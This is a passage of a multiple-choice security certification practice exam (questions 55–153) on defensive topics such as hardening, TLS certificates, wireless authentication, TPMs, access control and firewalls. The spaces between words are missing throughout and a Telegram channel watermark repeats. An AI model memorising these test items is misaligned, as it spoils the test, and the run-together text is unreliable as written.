Telegram Channel @nettrain
securityissueswiththecomputerthanyoucancurrentlydetect.Whatisthebestwaytotestthismalware?
A. Leavethemalwareonthatworkstationuntilitistested.
B. Placethemalwareinasandboxenvironmentfortesting.
C. Itisnotimportanttoanalyzeortestit;justremoveitfromthemachine.
D. Placethemalwareonahoneypotfortesting.
56. Youaretryingtoincreasesecurityatyourcompany.You'recurrentlycreatinganoutlineofalltheaspectsofsecuritythatwillneedtobeexaminedandactedon.WhichofthefollowingtermsdescribestheprocessofimprovingsecurityinatrustedOS?
A. FDE
B. Hardening
C. SED
D. Baselining
57. Melissa'swebsiteprovidesuserswhoaccessitviaHTTPSwithaTransportLayerSecurity(TLS)connection.Unfortunately,Melissaforgottorenewhercertificate,anditispresentinguserswithanerror.WhathappenstotheHTTPSconnectionwhenacertificateexpires?
A. Alltrafficwillbeunencrypted.
B. TrafficforuserswhodonotclickOKatthecertificateerrorwillbeunencrypted.
C. Trustwillbereduced,buttrafficwillstillbeencrypted.
D. Userswillberedirectedtothecertificateauthority'ssiteforawarninguntilthecertificateisrenewed.
58. Isaacisreviewinghisorganization'ssecurecodingpracticesdocumentforcustomer-facingwebapplicationsandwantstoensurethattheirinputvalidationrecommendationsareappropriate.Whichofthefollowingisnotacommonbestpracticeforinputvalidation?
A. Ensurevalidationoccursonatrustedserver.
B. Validateallclient-supplieddatabeforeitisprocessed.
Telegram Channel @nettrain
C. Validateexpecteddatatypesandranges.
D. Ensurevalidationoccursonatrustedclient.
59. Frankknowsthatthesystemsheisdeployinghaveabuilt-inTPMmodule.WhichofthefollowingcapabilitiesisnotafeatureprovidedbyaTPM?
A. Arandomnumbergenerator
B. Remoteattestationcapabilities
C. AcryptographicprocessorusedtospeedupSSL/TLS
D. Theabilitytobindandsealdata
60. Whatistheprimaryuseofhashingindatabases?
A. Toencryptstoreddata,thuspreventingexposure
B. Forindexingandretrieval
C. Toobfuscatedata
D. Tosubstituteforsensitivedata,allowingittobeusedwithoutexposure
61. Hansisasecurityadministratorforalargecompany.Usersonhisnetworkvisitawiderangeofwebsites.Heisconcernedtheymightgetmalwarefromoneofthesemanywebsites.Whichofthefollowingwouldbehisbestapproachtomitigatethisthreat?
A. Implementhost-basedantivirus.
B. Blacklistknowninfectedsites.
C. Setbrowserstoallowonlysignedcomponents.
D. Setbrowserstoblockallactivecontent(ActiveX,JavaScript,etc.).
62. Zarmeenahasimplementedwirelessauthenticationforhernetworkusingapassphrasethatshedistributestoeachmemberofherorganization.Whattypeofauthenticationmethodhassheimplemented?
A. Enterprise
B. PSK
C. Open
D. Captiveportal
63. OliviaisbuildingawirelessnetworkandwantstoimplementanExtensible
Telegram Channel @nettrain
AuthenticationProtocol(EAP)-basedprotocolforauthentication.WhatEAPversionshouldsheuseifshewantstoprioritizereconnectionspeedanddoesn'twanttodeployclientcertificatesforauthentication?
A. EAP-FAST
B. EAP-TLS
C. PEAP
D. EAP-TTLS
64. Youworkatalargecompany.Youareconcernedaboutensuringthatallworkstationshaveacommonconfiguration,thatnoroguesoftwareisinstalled,andthatallpatchesarekeptuptodate.Whichofthefollowingwouldbethemosteffectiveforaccomplishingthis?
A. UseVDI.
B. Implementrestrictivepolicies.
C. Useanimageforallworkstations.
D. Implementstrongpatchmanagement.
65. Naomihasdeployedherorganization'scloud-basedvirtualdatacenterstomultipleGoogledatacenterlocationsaroundtheglobe.Whatdoesthisdesignprovideforhersystems?
A. Resistancetoinsiderattacks
B. Highavailabilityacrossmultiplezones
C. Decreasedcosts
D. Vendordiversity
66. Patrickwantstodeployavirtualprivatenetworking(VPN)technologythatisaseasyforenduserstouseaspossible.WhattypeofVPNshouldhedeploy?
A. AnIPSecVPN
B. AnSSL/TLSVPN
C. AnHTML5L2TPVPN
D. AnSAMLVPN
67. Oliviaisresponsibleforwebapplicationsecurityforhercompany'se-
Telegram Channel @nettrain
commerceserver.SheisparticularlyconcernedaboutXSSandSQLinjection.Whichtechniquewouldbemosteffectiveinmitigatingtheseattacks?
A. Propererrorhandling
B. Theuseofstoredprocedures
C. Properinputvalidation
D. Codesigning
68. Isaacwantstopreventcorporatemobiledevicesfrombeingusedoutsideofhiscompany'sbuildingsandcorporatecampus.Whatmobiledevicemanagement(MDM)capabilityshouldheusetoallowthis?
A. Patchmanagement
B. IPfiltering
C. Geofencing
D. Networkrestrictions
69. Sophiawantstotesthercompany'swebapplicationtoseeifitishandlinginputvalidationanddatavalidationproperly.Whichtestingmethodwouldbemosteffectiveforthis?
A. Staticcodeanalysis
B. Fuzzing
C. Baselining
D. Versioncontrol
70. AlainahasimplementedanHSM.WhichofthefollowingcapabilitiesisnotatypicalHSMfeature?
A. Encryptionanddecryptionfordigitalsignatures
B. Bootattestation
C. Securemanagementofdigitalkeys
D. Strongauthenticationsupport
71. Cynthiawantstoissuecontactlesscardstoprovideaccesstothebuildingssheistaskedwithsecuring.Whichofthefollowingtechnologiesshouldshedeploy?
Telegram Channel @nettrain
A. RFID
B. Wi-Fi
C. Magstripe
D. HOTP
72. Alainawantstopreventbulkgatheringofemailaddressesandotherdirectoryinformationfromherweb-exposedLDAPdirectory.Whichofthefollowingsolutionswouldnothelpwiththis?
A. Usingaback-offalgorithm
B. ImplementingLDAPS
C. Requiringauthentication
D. Ratelimitingqueries
73. AlainahasbeentoldthatherorganizationusesaSANcertificateintheirenvironment.WhatdoesthistellAlainaaboutthecertificateinuseinherorganization?
A. Itisusedforastorageareanetwork.
B. ItisprovidedbySANS,anetworksecurityorganization.
C. Thecertificateispartofaself-signed,self-assignednamespace.
D. Thecertificateallowsmultiplehostnamestobeprotectedbythesamecertificate.
74. Edwardisresponsibleforwebapplicationsecurityatalargeinsurancecompany.Oneoftheapplicationsthatheisparticularlyconcernedaboutisusedbyinsuranceadjustersinthefield.Hewantstohavestrongauthenticationmethodstomitigatemisuseoftheapplication.Whatwouldbehisbestchoice?
A. Authenticatetheclientwithadigitalcertificate.
B. Implementaverystrongpasswordpolicy.
C. SecureapplicationcommunicationwithTransportLayerSecurity(TLS).
D. Implementawebapplicationfirewall(WAF).
75. SarahistheCIOforasmallcompany.Thecompanyusesseveralcustom
Telegram Channel @nettrain
applicationsthathavecomplicatedinteractionswiththehostoperatingsystem.Sheisconcernedaboutensuringthatsystemsonhernetworkareallproperlypatched.Whatisthebestapproachinherenvironment?
A. Implementautomaticpatching.
B. Implementapolicythathasindividualuserspatchtheirsystems.
C. Delegatepatchmanagementtomanagersofdepartmentssothattheycanfindthebestpatchmanagementfortheirdepartments.
D. Immediatelydeploypatchestoatestenvironment;thenassoonastestingiscomplete,haveastagedrollouttotheproductionnetwork.
76. Garyusesawirelessanalyzertoperformasitesurveyofhisorganization.Whichofthefollowingisnotacommonfeatureofawirelessanalyzer'sabilitytoprovideinformationaboutthewirelessnetworksaroundit?
A. Theabilitytoshowsignalstrengthofaccesspointsonamapofthefacility
B. TheabilitytoshowtheversionoftheRADIUSserverusedforauthentication
C. TheabilitytoshowalistofSSIDsavailableinagivenlocation
D. Theabilitytoshowtheversionofthe802.11protocol(n,ac,ax)
77. Emilianoisanetworkadministratorandisconcernedaboutthesecurityofperipheraldevices.Whichofthefollowingwouldbeabasicstephecouldtaketoimprovesecurityforthosedevices?
A. ImplementFDE.
B. Turnoffremoteaccess(SSH,Telnet,etc.)ifnotneeded.
C. Utilizefuzztestingforallperipherals.
D. Implementdigitalcertificatesforallperipherals.
78. Whattypeofcodeanalysisismanualcodereview?
A. Dynamiccodereview
B. Fagancodereview
C. Staticcodereview
D. Fuzzing
Telegram Channel @nettrain
79. Samanthahasusedssh-keygentogeneratenewSSHkeys.WhichSSHkeyshouldsheplaceontheservershewantstoaccess,andwhereisittypicallystoredonaLinuxsystem?
A. HerpublicSSHkey,/etc/
B. HerprivateSSHkey,/etc/
C. HerpublicSSHkey,~/.ssh
D. HerprivateSSHkey,~/.ssh
80. Ixxiaisasoftwaredevelopmentteammanager.Sheisconcernedaboutmemoryleaksincode.Whattypeoftestingismostlikelytofindmemoryleaks?
A. Fuzzing
B. Stresstesting
C. Staticcodeanalysis
D. Normalization
81. WhatIPaddressdoesaloadbalancerprovideforexternalconnectionstoconnecttowebserversinaload-balancedgroup?
A. TheIPaddressforeachserver,inaprioritizedorder
B. Theloadbalancer'sIPaddress
C. TheIPaddressforeachserverinaround-robinorder
D. AvirtualIPaddress
82. Whattermdescribesrandombitsthatareaddedtoapasswordbeforeitishashedandstoredinadatabase?
A. Flavoring
B. Rainbow-armor
C. Bit-rot
D. Salt
83. Victorisanetworkadministratorforamedium-sizedcompany.Hewantstobeabletoaccessserversremotelysothathecanperformsmalladministrativetasksfromremotelocations.Whichofthefollowingwouldbethebestprotocolforhimtouse?
Telegram Channel @nettrain
A. SSH
B. Telnet
C. RSH
D. SNMP
84. Danconfiguresaresource-basedpolicyinhisAmazonaccount.Whatcontrolhashedeployed?
A. Acontrolthatdetermineswhohasaccesstotheresource,andtheactionstheycantakeonit
B. Acontrolthatdeterminestheamountthatservicecancostbeforeanalarmissent
C. Acontrolthatdeterminestheamountofafiniteresourcethatcanbeconsumedbeforeanalarmisset
D. Acontrolthatdetermineswhatanidentitycando
85. Charlene'scompanyusesrack-mountedsensorappliancesintheirdatacenter.Whataresensorslikethesetypicallymonitoring?
A. Temperatureandhumidity
B. Smokeandfire
C. Powerqualityandreliability
D. Noneoftheabove
86. LaurelisreviewingtheconfigurationforanemailserverinherorganizationanddiscoversthatthereisaservicerunningonTCPport993.Whatsecureemailservicehasshemostlikelydiscovered?
A. SecurePOP3
B. SecureSMTP
C. SecureIMAP(IMAPS)
D. SecureMIME(SMIME)
87. Whattypeoftopologydoesanadhocwirelessnetworkuse?
A. Point-to-multipoint
B. Star
Telegram Channel @nettrain
C. Point-to-point
D. Bus
88. Whatistheprimaryadvantageofallowingonlysignedcodetobeinstalledoncomputers?
A. Itguaranteesthatmalwarewillnotbeinstalled.
B. Itimprovespatchmanagement.
C. Itverifieswhocreatedthesoftware.
D. ItexecutesfasteroncomputerswithaTrustedPlatformModule(TPM).
89. Samanthahasbeenaskedtoprovidearecommendationforherorganizationaboutpasswordsecuritypractices.Usershavecomplainedthattheyhavetoremembertoomanypasswordsaspartoftheirjobandthattheyneedawaytokeeptrackofthem.WhatshouldSamantharecommend?
A. Recommendthatuserswritepasswordsdownneartheirworkstation.
B. Recommendthatusersusethesamepasswordforsiteswithsimilardataorriskprofiles.
C. Recommendthatuserschangetheirstandardpasswordsslightlybasedonthesitetheyareusing.
D. Recommendapasswordvaultormanagerapplication.
90. Matthasenabledportsecurityonthenetworkswitchesinhisbuilding.Whatdoesportsecuritydo?
A. FiltersbyMACaddress
B. Preventsroutingprotocolupdatesfrombeingsentfromprotectedports
C. EstablishesprivateVLANs
D. PreventsduplicateMACaddressesfromconnectingtothenetwork
91. TomisresponsibleforVPNconnectionsinhiscompany.HiscompanyusesIPSecforVPNs.WhatistheprimarypurposeofAHinIPSec?
A. Encrypttheentirepacket.
B. Encryptjusttheheader.
C. Authenticatetheentirepacket.
Telegram Channel @nettrain
D. Authenticatejusttheheader.
92. MileswantstoensurethathisinternalDNScannotbequeriedbyoutsideusers.WhatDNSdesignpatternusesdifferentinternalandexternalDNSserverstoprovidepotentiallydifferentDNSresponsestousersofthosenetworks?
A. DNSSEC
B. SplithorizonDNS
C. DMZDNS
D. DNSproxying
93. Abigailisresponsibleforsettingupanetwork-basedintrusionpreventionsystem(NIPS)onhernetwork.TheNIPSislocatedinoneparticularnetworksegment.SheislookingforapassivemethodtogetacopyofalltraffictotheNIPSnetworksegmentsothatitcananalyzethetraffic.Whichofthefollowingwouldbeherbestchoice?
A. Usinganetworktap
B. Usingportmirroring
C. SettingtheNIPSonaVLANthatisconnectedtoallothersegments
D. SettingupaNIPSoneachsegment
94. Amandawantstoallowusersfromotherorganizationstologintoherwirelessnetwork.Whattechnologywouldallowhertodothisusingtheirownhomeorganization'scredentials?
A. Presharedkeys
B. 802.11q
C. RADIUSfederation
D. OpenIDConnect
95. Nathanwantstoensurethatthemobiledeviceshisorganizationhasdeployedcanonlybeusedinthecompany'sfacilities.Whattypeofauthenticationshouldhedeploytoensurethis?
A. PINs
B. Biometrics
Telegram Channel @nettrain
C. Context-awareauthentication
D. Content-awareauthentication
96. WhichofthefollowingbestdescribesaTPM?
A. TransportProtectionMode
B. Asecurecryptoprocessor
C. ADNSSECextension
D. TotalPatchManagement
97. JaniceisexplaininghowIPSecworkstoanewnetworkadministrator.SheistryingtoexplaintheroleofIKE.WhichofthefollowingmostcloselymatchestheroleofIKEinIPSec?
A. Itencryptsthepacket.
B. ItestablishestheSAs.
C. Itauthenticatesthepacket.
D. Itestablishesthetunnel.
98. Whatcertificateismostlikelytobeusedbyanofflinecertificateauthority(CA)?
A. Root
B. Machine/computer
C. User
D. Email
99. EmilymanagestheIDS/IPSforhernetwork.Shehasanetwork-basedintrusionpreventionsystem(NIPS)installedandproperlyconfigured.Itisnotdetectingobviousattacksononespecificnetworksegment.ShehasverifiedthattheNIPSisproperlyconfiguredandworkingproperly.Whatwouldbethemostefficientwayforhertoaddressthis?
A. Implementportmirroringforthatsegment.
B. InstallaNIPSonthatsegment.
C. UpgradetoamoreeffectiveNIPS.
D. IsolatethatsegmentonitsownVLAN.
Telegram Channel @nettrain
100. Danawantstoprotectdatainadatabasewithoutchangingcharacteristicslikethedatalengthandtype.Whattechniquecansheusetodothismosteffectively?
A. Hashing
B. Tokenization
C. Encryption
D. Rotation
101. Elenoraisresponsibleforlogcollectionandanalysisforacompanywithlocationsaroundthecountry.Shehasdiscoveredthatremotesitesgeneratehighvolumesoflogdata,whichcancausebandwidthconsumptionissuesforthosesites.Whattypeoftechnologycouldshedeploytoeachsitetohelpwiththis?
A. Deployalogaggregator.
B. Deployahoneypot.
C. Deployabastionhost.
D. Noneoftheabove
102. Daniisperformingadynamiccodeanalysistechniquethatsendsabroadrangeofdataasinputstotheapplicationsheistesting.Theinputsincludedatathatisbothwithintheexpectedrangesandtypesfortheprogramanddatathatisdifferentand,thus,unexpectedbytheprogram.WhatcodetestingtechniqueisDaniusing?
A. Timeboxing
B. Bufferoverflow
C. Inputvalidation
D. Fuzzing
103. TinawantstoensurethatrogueDHCPserversarenotpermittedonthenetworkshemaintains.Whatcanshedotoprotectagainstthis?
A. DeployanIDStostoprogueDHCPpackets.
B. EnableDHCPsnooping.
C. DisableDHCPsnooping.
Telegram Channel @nettrain
D. BlocktrafficontheDHCPportstoallsystems.
104. Endpointdetectionandresponsehasthreemajorcomponentsthatmakeupitsabilitytoprovidevisibilityintoendpoints.Whichofthefollowingisnotoneofthosethreeparts?
A. Datasearch
B. Malwareanalysis
C. Dataexploration
D. Suspiciousactivitydetection
105. Isabelleisresponsibleforsecurityatamid-sizedcompany.Shewantstopreventusersonhernetworkfromvisitingjob-huntingsiteswhileatwork.Whichofthefollowingwouldbethebestdevicetoaccomplishthisgoal?
A. Proxyserver
B. NAT
C. Apacketfilterfirewall
D. NIPS
106. Whattermdescribesacloudsystemthatstores,manages,andallowsauditingofAPIkeys,passwords,andcertificates?
A. AcloudPKI
B. AcloudTPM
C. Asecretsmanager
D. Ahushservice
107. Fredisbuildingawebapplicationthatwillreceiveinformationfromaserviceprovider.Whatopenstandardshouldhedesignhisapplicationtousetoworkwithmanymodernthird-partyidentityproviders?
A. SAML
B. Kerberos
C. LDAP
D. NTLM
108. Youareresponsibleforane-commercesite.Thesiteishostedinacluster.Whichofthefollowingtechniqueswouldbebestinassuringavailability?
Telegram Channel @nettrain
A. AVPNconcentrator
B. Aggregateswitching
C. AnSSLaccelerator
D. Loadbalancing
109. WhatchannelsdonotcauseissueswithchanneloverlaporoverlapinU.S.installationsof2.4GHzWi-Finetworks?
A. 1,3,5,7,9,and11
B. 2,6,and10
C. 1,6,and11
D. Wi-Fichannelsdonotsufferfromchanneloverlap.
110. Ryanisconcernedaboutthesecurityofhiscompany'swebapplication.Sincetheapplicationprocessesconfidentialdata,heismostconcernedaboutdataexposure.Whichofthefollowingwouldbethemostimportantforhimtoimplement?
A. WAF
B. TLS
C. NIPS
D. NIDS
111. Whichofthefollowingconnectionmethodsonlyworksviaaline-of-sightconnection?
A. Bluetooth
B. Infrared
C. NFC
D. Wi-Fi
112. Caroleisresponsibleforvariousnetworkprotocolsathercompany.TheNetworkTimeProtocolhasbeenintermittentlyfailing.Whichofthefollowingwouldbemostaffected?
A. Kerberos
B. RADIUS
Telegram Channel @nettrain
C. CHAP
D. LDAP
113. Youareselectinganauthenticationmethodforyourcompany'sservers.Youarelookingforamethodthatperiodicallyreauthenticatesclientstopreventsessionhijacking.Whichofthefollowingwouldbeyourbestchoice?
A. PAP
B. SPAP
C. CHAP
D. OAuth
114. Naomiwantstodeployafirewallthatwillprotectherendpointsystemsfromothersystemsinthesamesecurityzoneofhernetworkaspartofazero-trustdesign.Whattypeoffirewallisbestsuitedtothistypeofdeployment?
A. Hardwarefirewalls
B. Softwarefirewalls
C. Virtualfirewalls
D. Cloudfirewalls
115. Lisaissettingupaccountsforhercompany.ShewantstosetupaccountsfortheOracledatabaseserver.Whichofthefollowingwouldbethebesttypeofaccounttoassigntothedatabaseservice?
A. User
B. Guest
C. Admin
D. Service
116. GarywantstoimplementEAP-basedprotocolsforhiswirelessauthenticationandwantstoensurethatheusesonlyversionsthatsupportTransportLayerSecurity(TLS).WhichofthefollowingEAP-basedprotocolsdoesnotsupportTLS?
A. LEAP
B. EAP-TTLS
Telegram Channel @nettrain
C. PEAP
D. EAP-TLS
117. Mannywantstodownloadappsthataren'tintheiOSAppStore,aswellaschangesettingsattheOSlevelthatAppledoesnotnormallyallowtobechanged.WhatwouldheneedtodotohisiPhonetoallowthis?
A. Buyanappviaathird-partyappstore.
B. Installanappviaside-loading.
C. Jailbreakthephone.
D. InstallAndroidonthephone.
118. Manysmartcardsimplementawirelesstechnologytoallowthemtobeusedwithoutacardreader.Whatwirelesstechnologyisfrequentlyusedtoallowtheuseofsmartcardsforentry-accessreadersandsimilaraccesscontrols?
A. Infrared
B. Wi-Fi
C. RFID
D. Bluetooth
119. Carlhasbeenaskedtosetupaccesscontrolforaserver.Therequirementsstatethatusersatalowerprivilegelevelshouldnotbeabletoseeoraccessfilesordataatahigherprivilegelevel.Whataccesscontrolmodelwouldbestfittheserequirements?
A. MAC
B. DAC
C. RBAC
D. SAML
120. Jackwantstodeployanetworkaccesscontrol(NAC)systemthatwillstopsystemsthatarenotfullypatchedfromconnectingtohisnetwork.Ifhewantstohavefulldetailsofsystemconfiguration,antivirusversion,andpatchlevel,whattypeofNACdeploymentismostlikelytomeethisneeds?
A. Agentless,preadmission
B. Agent-based,preadmission
Telegram Channel @nettrain
C. Agentless,postadmission
D. Agent-based,postadmission
121. Clairehasbeennotifiedofazero-dayflawinawebapplication.Shehastheexploitcode,includingaSQLinjectionattackthatisbeingactivelyexploited.Howcanshequicklyreacttopreventthisissuefromimpactingherenvironmentifsheneedstheapplicationtocontinuetofunction?
A. DeployadetectionruletoherIDS.
B. Manuallyupdatetheapplicationcodeafterreverse-engineeringit.
C. DeployafixviaherWAF.
D. Installthevendorprovidedpatch.
122. Ericwantstoprovidecompany-purchaseddevices,buthisorganizationpreferstoprovideenduserswithchoicesamongdevicesthatcanbemanagedandmaintainedcentrally.Whatmobiledevicedeploymentmodelbestfitsthisneed?
A. BYOD
B. COPE
C. CYOD
D. VDI
123. Derekisinchargeofhisorganization'scertificateauthoritiesandwantstoaddanewcertificateauthority.Hisorganizationalreadyhasthreecertificateauthoritiesoperatinginamesh:A.SouthAmericanCA,B.theUnitedStatesCA,andC,theEuropeanUnionCA.AstheyexpandintoAustralia,hewantstoaddD.theAustralianCA.WhichCAswillDerekneedtoissuecertificatestofromD.toensurethatsystemsintheAustraliandomainareabletoaccessserversinA,B,andC'sdomains?
A. HeneedsalltheothersystemstoissueDcertificatessothathissystemswillbetrustedthere.
B. HeneedstoissuecertificatesfromDtoeachoftheotherCAssystemsandthenhavetheotherCAsissueDacertificate.
C. HeneedstoprovidetheprivatekeyfromDtoeachoftheotherCAs.
D. HeneedstoreceivetheprivatekeyfromeachoftheotherCAsanduseittosigntherootcertificateforD.
Telegram Channel @nettrain
124. Claireisconcernedaboutanattackergettinginformationregardingnetworkdevicesandtheirconfigurationinhercompany.Whichprotocolshouldsheimplementthatwouldbemosthelpfulinmitigatingthisriskwhileprovidingmanagementandreportingaboutnetworkdevices?
A. RADIUS
B. TLS
C. SNMPv3
D. SFTP
125. Benisusingatoolthatisspecificallydesignedtosendunexpecteddatatoawebapplicationthatheistesting.Theapplicationisrunninginatestenvironment,andconfiguredtologeventsandchanges.WhattypeoftoolisBenusing?
A. ASQLinjectionproxy
B. Astaticcodereviewtool
C. Awebproxy
D. Afuzzer
126. Ericisresponsibleforhisorganization'smobiledevicesecurity.Theyuseamodernmobiledevicemanagement(MDM)tooltomanageaBYODmobiledeviceenvironment.Ericneedstoensurethattheapplicationsanddatathathisorganizationprovidestousersofthosemobiledevicesremainassecureaspossible.Whichofthefollowingtechnologieswillprovidehimwiththebestsecurity?
A. Storagesegmentation
B. Containerization
C. Full-deviceencryption
D. Remotewipe
127. Muraliislookingforanauthenticationprotocolforhisnetwork.Heisveryconcernedabouthighlyskilledattackers.Aspartofmitigatingthatconcern,hewantsanauthenticationprotocolthatneveractuallytransmitsauser'spassword,inanyform.WhichauthenticationprotocolwouldbeagoodfitforMurali'sneeds?
A. CHAP
Telegram Channel @nettrain
B. Kerberos
C. RBAC
D. TypeII
128. AspartofthecertificateissuanceprocessfromtheCAthathercompanyworkswith,Marieisrequiredtoprovethatsheisavalidrepresentativeofhercompany.TheCAgoesthroughadditionalstepstoensurethatsheiswhoshesayssheisandthathercompanyislegitimate,andnotallCAscanissuethistypeofcertificate.Whattypeofcertificatehasshebeenissued?
A. AnEVcertificate
B. Adomain-validatedcertificate
C. Anorganizationvalidationcertificate
D. AnOCSPcertificate
129. Markwantstoprovideawirelessconnectionwiththehighestpossibleamountofbandwidth.Whichofthefollowingshouldheselect?
A. LTEcellular
B. Bluetooth
C. NFC
D. 802.11acWi-Fi
130. Whatistheprimaryadvantageofcloud-nativesecuritysolutionswhencomparedtothird-partysolutionsdeployedtothesamecloudenvironment?
A. Lowercost
B. Bettersecurity
C. Tighterintegration
D. Alloftheabove
131. EdneedstosecurelyconnecttoaDMZfromanadministrativenetworkusingSecureShell(SSH).Whattypeofsystemisfrequentlydeployedtoallowthistobedonesecurelyacrosssecurityboundariesfornetworksegmentswithdifferentsecuritylevels?
A. AnIPS
B. ANATgateway
Telegram Channel @nettrain
C. Arouter
D. Ajumpbox
132. Youworkforasocialmediawebsite.Youwishtointegrateyourusers’accountswithotherwebresources.Todoso,youneedtoallowauthenticationtobeusedacrossdifferentdomains,withoutexposingyourusers’passwordstotheseotherservices.Whichofthefollowingwouldbemosthelpfulinaccomplishingthisgoal?
A. Kerberos
B. SAML
C. OAuth
D. OpenID
133. Christinawantstoensurethatsessionpersistenceismaintainedbyherloadbalancer.Whatissheattemptingtodo?
A. Ensurethatallofaclient'srequestsgotothesameserverforthedurationofagivensessionortransaction.
B. AssignthesameinternalIPaddresstoclientswhenevertheyconnectthroughtheloadbalancer.
C. Ensurethatalltransactionsgotothecurrentserverinaround-robinduringthetimeitistheprimaryserver.
D. AssignthesameexternalIPaddresstoallserverswhenevertheyaretheprimaryserverassignedbytheloadbalancer.
134. TaraisconcernedaboutstaffinherorganizationsendingemailwithsensitiveinformationlikecustomerSocialSecuritynumbers(SSNs)includedinit.Whattypeofsolutioncansheimplementtohelppreventinadvertentexposuresofthistypeofsensitivedata?
A. FDE
B. DLP
C. S/MIME
D. POP3S
135. Jenniferisconsideringusinganinfrastructureasaservicecloudprovidertohostherorganization'swebapplication,database,andwebservers.Which
Telegram Channel @nettrain
ofthefollowingisnotareasonthatshewouldchoosetodeploytoacloudservice?
A. Supportforhighavailability
B. Directcontrolofunderlyinghardware
C. Reliabilityofunderlyingstorage
D. Replicationtomultiplegeographiczones
136. Thisimageshowsanexampleofatypeofsecuremanagementinterface.Whattermdescribesusingmanagementinterfacesorprotectedalternatemeanstomanagedevicesandsystems?
A. ADMZ
B. Out-of-bandmanagement
C. In-bandmanagement
D. ATLS
Telegram Channel @nettrain
137. ChrishasprovidedtheBitLockerencryptionkeysforcomputersinhisdepartmenttohisorganization'ssecurityofficesothattheycandecryptcomputersintheeventofabreachofinvestigation.Whatisthisconceptcalled?
A. Keyescrow
B. ABitLockerLocker
C. Keysubmission
D. AESjail
138. Marekhasconfiguredsystemsinhisnetworktoperformbootattestation.Whathasheconfiguredthesystemstodo?
A. Torunonlytrustedsoftwarebasedonpreviouslystoredhashesusingachainedbootprocess
B. TonotifyaBOOTPserverwhenthesystemhasbootedup
C. TohashtheBIOSofthesystemtoensurethatthebootprocesshasoccurredsecurely
D. Tonotifyaremotesystemormanagementtoolthatthebootprocesswassecureusingmeasurementsfromthebootprocess
139. Youhavebeenaskedtofindanauthenticationservicethatishandledbyathirdparty.Theserviceshouldallowuserstoaccessmultiplewebsites,aslongastheysupportthethird-partyauthenticationservice.Whatwouldbeyourbestchoice?
A. OpenID
B. Kerberos
C. NTLM
D. Shibboleth
140. WhichofthefollowingstepsisacommonwaytohardentheWindowsregistry?
A. Ensuretheregistryisfullypatched.
B. Settheregistrytoread-onlymode.
C. Disableremoteregistryaccessifnotrequired.
Telegram Channel @nettrain
D. Encryptalluser-moderegistrykeys.
141. Loisisdesigningthephysicallayoutforherwirelessaccesspoint(WAP)placementinherorganization.WhichofthefollowingitemsisnotacommonconcernwhendesigningaWAPlayout?
A. Determiningconstructionmaterialofthewallsaroundtheaccesspoints
B. Assessingpowerlevelsfromotheraccesspoints
C. Performingasitesurvey
D. Maximizingcoverageoverlap
142. Gabbyhasbeenlaidofffromtheorganizationthatshehasworkedatforalmostadecade.MarkneedstomakesurethatGabby'saccountissecurelyhandledafterherlastdayofwork.WhatcanhedotoheraccountasaninterimsteptobestensurethatfilesarestillaccessibleandthattheaccountcouldbereturnedtouseifGabbyreturnsafterthelayoff?
A. Deletetheaccountandre-createitwhenitisneeded.
B. Disabletheaccountandreenableitifitisneeded.
C. LeavetheaccountactiveincaseGabbyreturns.
D. ChangethepasswordtooneGabbydoesnotknow.
143. Masonisresponsibleforsecurityatacompanythathastravelingsalespeople.ThecompanyhasbeenusingABACforaccesscontroltothenetwork.WhichofthefollowingisanissuethatisspecifictoABACandmightcauseittoincorrectlyrejectlogins?
A. Geographiclocation
B. Wrongpassword
C. RemoteaccessisnotallowedbyABAC.
D. FirewallsusuallyblockABAC.
144. Darrellisconcernedthatusersonhisnetworkhavetoomanypasswordstorememberandmightwritedowntheirpasswords,thuscreatingasignificantsecurityrisk.Whichofthefollowingwouldbemosthelpfulinmitigatingthisissue?
A. Multifactorauthentication
Telegram Channel @nettrain
B. SSO
C. SAML
D. LDAP
145. Frankisasecurityadministratorforalargecompany.Occasionally,auserneedstoaccessaspecificresourcethattheydon'thavepermissiontoaccess.Whichaccesscontrolmethodologywouldbemosthelpfulinthissituation?
A. Mandatoryaccesscontrol(MAC)
B. Discretionaryaccesscontrol(DAC)
C. Role-basedaccesscontrol
D. Rule-basedaccesscontrol
146. Edisdesigningthesecurityarchitectureforhisorganization'smoveintoaninfrastructureasaservicecloudenvironment.Inhison-sitedatacenter,hehasdeployedafirewallinfrontofthedatacenternetworktoprotectit,andhehasbuiltrulesthatallownecessaryservicesin,aswellasoutboundtrafficforupdatesandsimilarneeds.Heknowsthathiscloudenvironmentwillbedifferent.Whichofthefollowingisnotatypicalconcernforcloudfirewalldesigns?
A. Segmentationrequirementsforvirtualprivateclouds(VPCs)
B. Hardwareaccessforupdates
C. Thecostofoperatingfirewallservicesinthecloud
D. OSIlayersandvisibilityoftraffictocloudfirewalls
147. Ameliaislookingforanetworkauthenticationmethodthatcanusedigitalcertificatesanddoesnotrequireenduserstorememberpasswords.Whichofthefollowingwouldbestfitherrequirements?
A. OAuth
B. Tokens
C. OpenID
D. RBAC
148. Damianhasdesignedandbuiltawebsitethatisaccessibleonlyinsideofacorporatenetwork.Whattermisusedtodescribethistypeofinternal
Telegram Channel @nettrain
resource?
A. Anintranet
B. Anextranet
C. ADMZ
D. ATTL
149. ThefirewallthatWalterhasdeployedlooksateverypacketsentbysystemsthattravelthroughit,ensuringthateachpacketmatchestherulesthatitoperatesandfilterstrafficby.Whattypeoffirewallisbeingdescribed?
A. Nextgeneration
B. Stateless
C. Applicationlayer
D. Stateful
150. NancywantstoprotectandmanageherRSAkeyswhileusingamobiledevice.Whattypeofsolutioncouldshepurchasetoensurethatthekeysaresecuresothatshecanperformpublickeyauthentication?
A. Anapplication-basedPKI
B. AnOPAL-encrypteddrive
C. AMicroSDHSM
D. AnofflineCA
151. OliverneedstoexplaintheaccesscontrolschemeusedbyboththeWindowsandLinuxfilesystems.Whataccesscontrolschemedotheyimplementbydefault?
A. Role-basedaccesscontrol
B. Mandatoryaccesscontrol
C. Rule-basedaccesscontrol
D. Discretionaryaccesscontrol
152. Stefanjustbecamethenewsecurityofficerforauniversity.Heisconcernedthatstudentworkerswhoworklateoncampuscouldtrytologinwithfacultycredentials.Whichofthefollowingwouldbemosteffectiveinpreventingthis?
Telegram Channel @nettrain
A. Time-of-dayrestrictions
B. Usageauditing
C. Passwordlength
D. Credentialmanagement
153. Next-generationfirewallsincludemanycutting-edgefeatures.Whichofthefollowingisnotacommonnext-generationfirewallcapability?
A. Geolocation
B. IPSand/orIDS
C. Sandboxing
D. SQLinjection
